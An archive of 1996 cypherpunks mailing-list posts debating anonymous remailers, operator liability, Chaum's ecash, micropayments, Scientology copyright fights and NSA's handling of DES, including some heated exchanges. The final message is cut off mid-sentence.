> Even then, I prefer the judicial process to the oligarchy
> this scheme would entail

This scheme is *not* an oligarchy.  Pay a visit to any good dictionary 
near you.  Words have precise meaning and it is *much* better to 
stick to it...

Actually, since it is ruled by money, it might be a "buckarchy", but 
again, everybody can spare a few bucks, so it might be a democracy 
too if you insist on twisting the meaning of words.

> and I think I'd be an easy target for
> wealthy statists, who could also use the system.

At first look, of course.  But operationnally, you have to consider the 
mind of the statist to figure out the likeliness of their using the 
system? I do not deny that it is very likely that a few statists will 
use the system.  But most won't because they don't like to slain 
their milk cows.

Remember, we are idea-processing machines.

> If Bell could post
> fewer times, he'd be more convincing. He is in many killfiles. JMR

Many peoples cannot stand to see any opinions that differs from 
theirs.  But why care at all be read by such peoples?

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants;  physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Tue, 21 May 1996 06:39:15 +0800
To: Ian Goldberg <iang@cs.berkeley.edu>
Subject: Re: My meeting with Chaum (Also: ecash full anonymity and a legal question)
In-Reply-To: <199605182128.OAA32155@abraham.cs.berkeley.edu>
Message-ID: <Pine.GSO.3.93.960520164931.11439G-100000@happyman>
MIME-Version: 1.0
Content-Type: text/plain


 Sat, 18 May 1996, Ian Goldberg wrote:

> I am, in fact, going to Canada, and was considering writing a version of
> the library while I was there.  Now, Chaum has a patent on 2 lines of
> code (blinding the coin before it goes to the bank, and unblinding the
> value returns).  Believe it or not, I would like to stay within the law.

BTW why isn't some other company besides DigiCash selling similar software
product as the Ecash mint & client? Are there some international patents
or trade secrets involved? There is a real market for similar software
solution and it should not be too hard to write, considering it is a
financial system and there is big money involved.

Public domain ecash software would be an interesting effort to accomplish.
In case of full source availability it should be possible to develop
commercial systems based on public software, it might even be more secure
than commercial software which source is available for review to only
certain persons.

There is also a problem with Digicash licencing: they licence only to
banks, and usually only to one bank in each country. I believe there are
also many companies that are not banks, who would also like to issue ecash
for specific purposes. Setting up an separate company issuing electronic
cash, not connected to any of the existing banks, is something that
probably will happen sooner or later. Of course there are problems of
legislation and clients trusting the company, but those are not problems
that the software manufacturer like Digicash should decide.

Jüri Kaljundi
jk@stallion.ee
AS Stallion





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 21 May 1996 16:20:38 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: Toastmasters?
In-Reply-To: <DPH9ND2w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.93.960520172826.3940D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 May 1996, Dr. Dimitri Vulis wrote:

> Black Unicorn <unicorn@schloss.li> writes:
> 
> > On Mon, 20 May 1996, Senator Exon wrote:
> > 
> > > How do corporations work, in terms of liability?  If the cost of 
> > > incorporating isn't forbidding, I would think a remailer operator might 
> > > consider incorporating a company, and making the remailer a function of 
> > > that company.  That way, any losses are restricted to the total value of 
> > > the corporation; that is, nothing.  Any flaws?  There must be something 
> > > wrong with it somewhere.
> > 
> > All the corporate officers are public knowledge.
> 
> You seem to be confused. If the corporation isn't publicly traded, why should
> any information other than the address for service of process be public?

Ask every state which has such reporting requirements (which is every
state in the union).

If you wanted to form an offshore corporation you'd have to form an
exempted one.

> 
> > The corporate veil can pretty easily be perferated if there is a willful
> > attempt to avoid liability when conduct gets above a certain threshold.
> > 
> > This would be pretty easy to show in the event the corporation never made
> > dime one and never intended to.
> 
> What if the corporation intends to collect e-cash for operating the remailer?

That would clearly change the analysis.

> (Of course, one can still be sued...)
> 
> ---
> 
> Dr. Dimitri Vulis
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant, ULC" <mark@unicorn.com>
Date: Tue, 21 May 1996 15:00:27 +0800
To: cypherpunks@toad.com
Subject: Long-Lived Remailers
Message-ID: <Pine.3.89.9605201739.A24513-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



With regard to the problems of remailers being shut down when we want
long-lived addresses, wouldn't seperating the input and output be one
possibility? That is (like Hal's Alumni remailer) you'd send mail to
'remailer@anon.ai' and it would be forwarded via a disposable account
elsewhere. All messages would appear to come from 'disposable@foo.com' and
if that account was shut down a new one could be opened to replace it
while incoming mail simply backed up at the main remailer account. 

The only potential problem I could see would be that the disposable ISP
might have logs which could track the outgoing messages back to the other
account. You'd also obviously need to open the disposable account
anonymously or using an ISP who'd protect your identity. 

	Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 21 May 1996 19:22:26 +0800
To: cypherpunks@toad.com
Subject: DOS/WINDOWS Mixmaster Client
Message-ID: <199605210105.SAA10207@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone know if there is a DOS or Windows version of the mixmaster
client? 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Tue, 21 May 1996 19:52:14 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: The Crisis with Remailers
In-Reply-To: <199605192015.NAA15002@netcom17.netcom.com>
Message-ID: <Pine.BSF.3.91.960520181221.350A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> [remailer incentives]
> >As you said, ecash postage could turn that around. The negative publicity
> >part is probably the result of the general public's negative perceptions
> >about anonymity. 

> not!!! I should have made this clear, but imho no matter how favorably
> the public sees anonymity, I still believe there will be little
> incentive to run remailers until there is some kind of ecash
> scheme.

Re-read that first sentence I wrote: "As you said, ecash postage could
turn that around." You made yourself clear; I wasn't arguing against the
value of ecash postage, I was agreeing with it. 

The negative publicity associated with anonymity (and thus remailers) will
make remailers less valuable to their operators. That is, the operators
will want more ecash to make the venture worth the negative publicity. 

I think there are a lot more people who would be willing to run a remailer
as a hobby, if there weren't that negative publicity issue. I probably
would... But negative publicity is a liability in itself, in a way. 

I agree that ecash postage would probably provide the biggest boost to
remailers, but I don't think we should underestimate the negative effects
of the bad publicity and liability. 

> you are going to have "bad" uses of anonymity going on as
> long as you provide the capability. ask the remailer operators to
> estimate how much of their mail is simply taunts between college
> students or sexual harassment. I doubt you will ever be able to
> evade this.

Yes, there will be (and are) bad uses. And I do agree that most of the
anonymous posts right now are probably not what the cpunks intended to
allow. But I think people would be more willing to accept remailers, warts
and all, if they didn't have preconceptions about anonymity. 

> what cpunks might investigate is an idea of having a pseudonym
> server that somehow automatically registers complaints and stamps
> messages with known reputation levels.

If a message is actually anonymous, then there is no way to attach any
sort of reputation. Pseudonymity is a completely seperate matter. If
spammers don't want to have complaints tagged to them (which they probably
don't), they won't use a pseudonymous remailer, they'll use an anonymous
remailer. Anon.penet.fi may be an exception, but I believe that's only
because it's easy to use.

> >People seem to forget that anyone can drop a letter into the mailbox with
> >no return address. Did the Unabomber bring negative publicity to the 
> >postal service, causing people to demand that return addresses become a 
> >requirement? :-/

> agreed, but the subject at hand was not whether anonymity is good or bad, 
> but whether there is some incentive to run remailers.

Again, public perception about anonymity is an issue, because remailers
(and remailer operators) will have a certain stigma attached.

Liability might also be related to the public perception. If everyone
accepted anonymous remailers the same as they accept that people can mail
letters without a return address, then I think nobody would be able to
take legal action against remailer operators, just as nobody (AFAIK) has
taken legal action against the US Postal Service for their 'involvement'
in the unabomber case. 

> >Liability depends on the jurisdiction, doesn't it? It would be ideal if
> >all remailers were in countries where there are no laws that would affect
> >remailers. Reducing liability also has the added benefit of protecting
> >anonymity, since if the mailer can't be siezed, that does prevent log
> >files (if any) from being siezed.

> by liability I am also referring to a situation in which the 
> internet provider is pressured to quit the service by *anyone* not
> necessarily agents of the government. past examples are strong evidence
> that it does not at all require a government to shut down a remailer
> via pressure. anon.penet.fi at one point was pressured to shut down
> by "a well known net celebrity"

I think the non-governmental interference is a very interesting point, but
I still think jurisdiction is an issue. The Co$ (AFAIK) always had a legal
leg to stand on because of copyright law. If the remailers were in a
country where it would not be affected by copyright laws, the Co$ would
probably have been as ineffective as a person saying "Shut down your
remailer because someone has been using it to advocate nose-picking." 

> >Remailers can already be set up _not_ to send to certain addresses, so I 
> >think there's no reason that they couldn't be set to deliver _only_ to 
> >other remailers.

> hee, hee. I think you need to think that out a bit more.

You snipped the paragraph before that one, and I guess you didn't read
it... There was the sentence, "Obviously we'd still need _some_ remailers
that can deliver to the intended destination".

Remailers that deliver only to other remailers can be used for chaining
purposes and nothing else. Such remailers could be used for any link in
the chain, _except_ the last link, since the last link has to be able to
deliver to the destination email address.

This has the advantage that the operators of those remailers won't have
their names attached to spam (I think I mentioned that) and so they won't
recieve a gazillion complaints about the spam. It would also mean less
liability to those operators, since the first target of pressure groups
would surely be (and mostly is) the remailer who's name is attached to the
offending post. 

Of course, this won't help the remailers that are the last link in the chain,
but it would provide more remailers for chaining purposes.

> well, the issue we were addressing is why remailers haven't proliferated
> like other services. it is true that the usage of them has probably
> gone up exponentially, or at least very significantly. but they don't
> seem to have multiplied in number in the same way. growth in # of
> remailers has been linear at best.

I think remailers are only a niche thing.

When people start using the internet and some sort of untraceable packet
forwarding service in their everyday work, and discover that they can
evade taxes that way, then people will start moving towards it in droves,
simply because it would mean that they could work for less pay (pleasing
their employer) and yet have more take-home cash. I don't think
_remailers_ will ever have this sort of popularity, because they don't
allow TCP-like stream connections needed for web connections, PGPfone,
etc. 

BTW, I'm fairly certain that an anonymous/pseudonymous packet forwarding
service could be created to handle TCP connections... It should already be
possibe... It would require few additions to the TCP stack software to
allow encrypted connections, and some way to have TCP connections inside
TCP connections. And of course, servers would be required.


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBMaEZpdtVWdufMXJpAQFRyQf/cq3xcuEJcAY/HOmbCMZ/JcxkSkUFuSHC
dsmQG463UtF7W2hC7DDk8Y+Q1BcNTL96OaHPuPUU1lgyKEDBHXRcGLVkhX7UmBN1
MBfpB9ljBz+XMGAx7yR5ARmO37K133dmVJyXRtbLR0UC64wFFfTN9khlZS6HoCmC
ODItgkdI1uJeP6u00vKm6eMZ6OCKvzC6ABkEhr02npdRjTCW2iqhMZdXGsElkiLC
SsK0sNbAb/tGj6alrNDa6m1eisuTXxaRNoncMRdhSjHfOoPma2Z93EB+Mky7zl1/
0OSpNJyI3UXU9rIXhvkAdquczq71IycWHtp5TscF5E0qNYoA7NhVhQ==
=zMEN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant, ULC" <mark@unicorn.com>
Date: Tue, 21 May 1996 10:10:43 +0800
To: cypherpunks@toad.com
Subject: Ooops
Message-ID: <Pine.3.89.9605201828.A24513-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



I see my brilliant idea has already been suggested. Remind me never to 
post when I'm a hundred messages behind in future...

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 21 May 1996 16:03:43 +0800
To: cypherpunks@toad.com
Subject: An alternative to remailer shutdowns (fwd)
Message-ID: <199605202328.SAA14914@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 20 May 1996 15:02:08 -0700
> From: Hal <hfinney@shell.portal.com>
> Subject: An alternative to remailer shutdowns

> was apparently sent through my remailer.  According to 18 USC 875(c),
> "Whoever transmits in interstate commerce any communication containing
> any threat to kidnap any person or any threat to injure the person of
> another, shall be fined not more than $1,000 or imprisoned not more
> than five years, or both."  I may not be able to continue operating
> either of my remailers (alumni.caltech.edu and shell.portal.com) for
> much longer due to this kind of abuse.

There should be a section in there dealing with 'knowingly'. If not then we
should immediately bring charges against any and all newspapers who have
ever printer a ransom letter, or perhaps even the Unibomber Manifesto since
there is clear evidence of 'threat to injure the person of another'.


                                                   Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 21 May 1996 19:48:36 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: WELCOME TO THE NEW ROMAN EMPIRE
In-Reply-To: <199605201541.LAA17549@jekyll.piermont.com>
Message-ID: <Pine.GUL.3.93.960520182617.489Q-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Since we've already descended into the gutter, I might as well chime in
with the standard:

Dave Harman is, as far as I can tell, a troller whose only interest is in
causing fights. Some people think he's a racist, but I think he's just an
asshole with no convictions of any kind.

 http://www.almanac.bc.ca/cgi-bin/ftp.pl?people/h/harman.david

-rich

On Mon, 20 May 1996, Perry E. Metzger wrote:

> Dave Harman writes:
> > Qut may attend the [cypherpunks] meeting to verify the racial
> > compositions of the group.
> 
> Why? You have something against black people?
> 
> .pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 21 May 1996 20:01:51 +0800
To: cypherpunks@toad.com
Subject: Re: Senator, your public key please?
Message-ID: <adc66a74150210043a32@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:45 PM 5/20/96, Andrew Loewenstern wrote:
...
>Your local KCA (KKK Certification Authority) could as easily issue a "This
>key is owned by a Nigger." certificate for a public key as TRW could issue a
>"This key is owned by a Deadbeat." certificate.  Presumably, future versions
>of PGP and other public-key crypto systems will support free-form certificate
>generation and not the quasi-fixed-definition signatures currently found in
>PGP.

Indeed, this is one of the things I was referring to. To wit, that one can
possibly (emphasis on "possibly," modulo legal actions, a la my point) use
"Metzger's Web of Trust" to effectively discriminate.

(ObCaveat: I personally think a free society cannot/should not outlaw
discrimination in any form, save that by government.)

>You can be sure that there will be rallying cries for laws to be passed to
>ensure the accuracy of statements made in key certificates, that characters
>are not defamed, that libel is not committed, etc...  Lots of the same issues
>involving any other type of speech and the international and sometimes
>untraceable nature of the Net.  What do you do about a signature on your key,
>posted anonymously to the net, which names you as one of the Four
>Horsemen(*tm)?

By the way, this issue has some echoes of another technogical issue: the
use of neural nets for loan approval software. Turns out that when a bunch
of things are entered into a NN loan package, including the all-important
default rate, the applicant's age, income, race, sex, education, employment
history, credit history, etc., that NN loan packages "end up" rejecting
many black applicants, more so than white or Asian applicants. (The NN
"concluded" that blacks were higher risks for default than whites/Asians.)

Even if no human being ever entered his or her biases and prejudices, the
NN spit out this result.

I recall there being talk about requiring "equality of outcomes," and that
such NNs might have to have deliberately-biased inputs fed in, but I don't
know what ever happened to this issue.

In any case, I think this sort of issue, and the semi-related issue of
"discrimination via key signatures," to be likely important issues in the
courts in the coming years.

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Tue, 21 May 1996 19:32:58 +0800
To: cypherpunks@toad.com
Subject: Hiding remailers behind nymservers...?
Message-ID: <Pine.BSF.3.91.960520183838.350B-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This 'middle-man' remailer... What does it really accomplish? Sure, the
operator is hidden, but that's only because of his/her nym at c2.org...
AFAICS, the 'middle-man' has just taken the liability off himself and put
it on the unhidden remailers. Why not just use the existing unhidden
remailers??? 

I think this is similar to the idea that came up about having some (but
not all) remailers only deliver to other remailers, for use as any link in
a chain except the last link. The operator doesn't have his email address
attached to spam, and there's very little liability because Co$ and other
pressure groups will always(?) go after the last remailer in the chain,
since that's the only one they can know was involved. 

I think the pseudonymously hidden remailer is an interesting idea, but I
don't think it offers anything over the unhidden remailers, since it's
still depending on the unhidden ones.. If you want to aviod liability,
what's wrong with running a remailer that only delivers to other
remailers, as I mentioned above? 

Am I missing something here? 


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBMaEhlNtVWdufMXJpAQEUbwf9F1081yRIazOUcr/z+ifihD5PLTr70V9X
zvp13QXvPVao5Jg1N83Tfrar7zQYnvHU2RYPVBLecxZAY0hhbRRhOF/GVhkfcm2g
ehNuQdTxilVTRbCez49zLpXxQEKvnullLYOZY3qv1xe9MaqjuS5C73c3H5oNhQTz
B79cdvLynsIrhXD5oLyZyUxX/fggsFIfQsAh6a1KAdC0OclF1/dm1WeJKADSMFq4
bBt5BZcd410tfwpy+VTD5TUt7tb2wAOv56tVKVcPIXPZ04hr4Nlww6pQ+dtR4/B0
j1lzfrdDxos6h33abB9TpKrfo8uBsGxlkGyefqre+qvfexZwv/Wpmg==
=sJVW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 21 May 1996 18:07:36 +0800
To: cypherpunks@toad.com
Subject: Remailers, Copyright, and Scientology
Message-ID: <adc67d21170210049d4e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:15 PM 5/20/96, Rich Burroughs wrote:
>At 01:08 AM 5/20/96 -0700, tcmay@got.net (Timothy C. May) wrote:
>[snip]
>>And the issue of CoS seeking legal actions against those they claim are
>>violating their copyrights is separable from their religious status.
>
>Not at all.  Their actions are based on their religious doctrines, as passed
>down by Hubbard.  "Always attack, never defend."  Their claims of copyright
>violation are part of an ongoing effort to silence those who criticize their
>illegal and immoral practices.  They should be examined in that context.

I don't care what their motivations, religious or other, are.

As I see it, some people here (including some good friends of mine, by the
way) are caught up in a religious war. Those opposed to CoS are "outing"
putative CoS secrets by aggressive use of remailers. The CoS is fighting
back. Is anyone surprised?

>> As I
>>have said many times, "Newsweek" would likely take similar actions in
>>similar circumstances.)
>
>AFAIK, "Newsweek" does not file lawsuits just for the purpose of harassment,
>as Hubbard counselled his followers to do.  AFAIK, "Newsweek" does not hire
>PIs to harass those who criticize them.\

Well, I have heard Brad Templeton (Hi, Brad!, when you find this reference
to yourself with Alta Vista) say several times why he and his company,
Clarinet, aggressively go after those he thinks are infringing. Brad has to
protect his copyrights, or the transitive copyrights of AP, Reuters, etc.,
that he acquires through licensing.

And as I recall, a whole bunch of people have gotten "cease and desist"
letters. Even some friends of mine.

This gets less attention than do similar letters sent to Grady Ward and
Keith Henson, for example, because Grady, Keith, and others are caught up
in a Holy War against L. Ron, and the Battles with the Clams are more
interesting to most of us than some otherwise-obscure copyright
infringement filed by "Newsweek."

(Having worked at Intel for a number of years, let me assure you right away
that if remailers were used to post internal Intel documents--and I don't
mean stuff like the "unauthorized opcodes"--that Intel would come down on
the remailer sites and anyone else they could reach like two galaxies
colliding. By the way, I expect something like this to happen eventually.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Tue, 21 May 1996 16:45:07 +0800
To: Reid <root@edmweb.com>
Subject: Re: The Crisis with Remailers
In-Reply-To: <Pine.BSF.3.91.960518183037.484A-100000@bitbucket.edmweb.com>
Message-ID: <m2g28uhgh3.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Steve" == Steve Reid <root@edmweb.com> writes:

Steve> Ecash postage might discourage the average spammer, unless that
Steve> spammer has deep pockets. With postage, the only spam I can
Steve> think of that would gain money or break even is a commercial
Steve> advertisment, and there's no point to using remailers for
Steve> commercial ads anyways, since people need to know how to
Steve> contact the business.

It isn't spam if they're paying for the traffic.  Commercial
advertisement through electronic mail is only evil because it is
forced on someone against their wishes and on their dime.  The current
situation is much like a telemarketer calling long distance collect
with billing done automatically, and you can't hang up until they're
done with their spiel.

If it were standard practice for email recipients to charge the sender
an ecash fee (waived if they thought the mail worth their time), it
would make things much more interesting.

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 21 May 1996 17:37:33 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: L.D. FAQ
In-Reply-To: <9605202031.AA06468@cti02.citenet.net>
Message-ID: <Pine.LNX.3.93.960520201603.772A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 20 May 1996, Jean-Francois Avon wrote:

> On 20 May 96 at 14:51, Jim Ray wrote:
> 
> > [He IS L.D., nobody else would say "anti-psuedospoofing."]
> Since I hit C'punks around 6 months ago, I have no idea who this 
> mythical figure is, alhought I see the name pop-up occasionnally.
> 
> Is there a Detweiller FAQ somewhere?

Yes.  It is somewhere on L.D.'s page at http://www.csn.net/~ldetweil/ .

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMaEL1LZc+sv5siulAQGQzQQAiY0ysWfoeKpQkZYSTJB4oF+6coTxulf5
ARL5zcdz2dc+ifTgO9fbwa48eXlzoTCh1zW6R5h12rmQYaN1ZLDfPiufWv8CYqrl
MvFXzoyjNIYYv6pvM68O6ECrZ+KYa4dbG28tM08NnVYfQsAcZW+WdQlWMc/3ZViU
dPfwsVyXgxo=
=+TaH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 21 May 1996 18:51:38 +0800
To: ravage@ssz.com
Subject: Re:  An alternative to remailer shutdowns (fwd)
Message-ID: <199605210333.UAA04650@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Jim Choate <ravage@ssz.com>
> > From: Hal <hfinney@shell.portal.com>
> > "Whoever transmits in interstate commerce any communication containing
> > any threat to kidnap any person or any threat to injure the person of
> > another, shall be fined not more than $1,000 or imprisoned not more
> > than five years, or both."
> 
> There should be a section in there dealing with 'knowingly'. If not then we
> should immediately bring charges against any and all newspapers who have
> ever printer a ransom letter, or perhaps even the Unibomber Manifesto since
> there is clear evidence of 'threat to injure the person of another'.

I think Jim is right about the knowledge requirement, which although not
stated explicitly in the statute, has been held by the courts to be an
essential element.  My point in quoting is more to show an example of the
kinds of clearly illegal postings which operators have to deal with.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 22 May 1996 07:47:35 +0800
To: stewarts@ix.netcom.com>
Subject: Re: Rumor: DSS Broken?
Message-ID: <199605210341.UAA25393@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:05 AM 5/20/96 -0700, Bill Frantz wrote:
>At  8:05 PM 5/19/96 -0800, jim bell wrote:

>>It should occur to all of us that if the NSA was actually doing the job we 
>>are vastly over-paying them to do, it is THEY who should be finding, 
>>exposing, and correcting these kinds of cryptography faults.  Has anybody 
>>ever heard any evidence that the NSA has ever acted in this sort of 
>>responsible role?
>
>I was rather impressed by NSA's role in the creation of DES.  The
>strengthened it against an attack which was not publicly known, and didn't,
>in the process, reveal the attack.  (See AC2.)

Isn't this partly bad, at least?  Sure, if DES was a working, operational 
cryptosystem revealing the attack immediately might be arguably 
irresponsible.  But since it was merely a design, exposing the flaw didn't 
help the enemy or hurt "us."  

Had DES been in use, the NSA could merely have stated, publicly, that "We 
see a flaw in DES, and we will tell you all about it in 5 years.  Enclosed 
is an encrypted description of the problem, encrypted using a single key 
system with a 128-bit key.  Save it for your files.  In five (5) years we 
will publish the key to decrypt that file, and you will then know what we 
know now."

At that point, anybody who then was using DES would have a five year warning 
to replace it.  And the NSA would be unable to change the contents of what 
they were revealing, because they would only be withholding the key.

Also, exposing the flaw in DES could have alerted the developers of other 
cryptosystems to watch for the same attack on their systems.

All in all, I don't think the NSA's near-silence on DES is unambiguously 
commendable.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 21 May 1996 18:22:14 +0800
To: Ian Goldberg <cypherpunks@toad.com
Subject: Re: Is Chaum's System Traceable or Untraceable?
Message-ID: <199605210341.UAA25407@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:10 AM 5/20/96 -0700, Ian Goldberg wrote:

>>So are there any flaws with above procedure?
>
>Yup; with the current protocols, there's no way to do change.  For the shop
>to pay you change, besides suddenly losing your anonymity as a payee, you
>would have to go online immediately to clear the coins, which assumedly
>is infeasable.
>
>However, if you use the "fully anonymous" protocol, change becomes trivial.
>You don't have to go online; the payer (the shop) does, which it assumedly
>already is.  Another benefit is that coins received in this way as change
>are immediately spendable by you, without having to go online in between.
>
>The "fully anonymous" protocol turns out to be _exactly_ what is needed
>for situations like this.

Wouldn't it be interesting if someday, somebody paying for something with 
digital cash asked the shopkeeper "Why can't you give me change for my 
purchase?"  and the answer was, "If we could give you change, you could 
overthrow all the governments in the world."



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 21 May 1996 16:48:33 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
Message-ID: <199605210341.UAA25423@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:32 AM 5/20/96 -0700, Ian Goldberg wrote:

>I mentioned this to Chaum, and he didn't really seem agree with the need for
>something lower-level...
>
>Another problem with postage in Mixmaster:  the minimum ecash payment is
>$0.01.  Do we want to charge that much for email?  Need we consider
>micropayments?

Absolutely!  Given the exponentially increasing rate of data transmission 
ease, and corresponding cost reduction per bit, any "reasonable" minimum 
payment today becomes an unreasonable one tomorrow, and a hilariously 
outrageous one 10 years from now.

Suppose the US Government had put a "information storage tax" on hard disks 
in about 1980, of about $10 per megabyte which would have worked out to be 
about 1/20 of the retail value at that time.  Today, a 1.6 gigabyte hard 
disk would cost about $1850, which would be $250 for the drive and $1600 for 
the tax...

Any more questions?

Many months ago, I suggested using the idea of "probabilistic payments," in 
which a person could make a very tiny purchase with a large coin, by in 
effect "gambling" with the payment:  You could buy a 0.1-cent email with a 
1-cent coin, in which the likelihood of actually paying is 10%.  
Statistically, both myself and the vendor will be happy in the long run.  An 
advantage of this system is that the payments can be made arbitrarily small 
and of indefinite granularity:  I can pay you 0.3156893 cents with only 
1-cent coins.

I would be surprised if I was the first to think of such a system, at least 
in the ecash world, but I never heard anything to the contrary.






Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <>
Date: Tue, 21 May 1996 17:12:35 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605210419.VAA11932@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! > The Australian law is (or was) based on the idea that if you charged
! > someone $2500 for eating the flesh of christ, it then becomes
! > legitimate for the government to check out whether or not the
! > customer was getting actual flesh of Christ. 
! 
! Well, although it makes for an expensive steak, it is still quite 
! cheap considering that in the days of JC, they did not have 
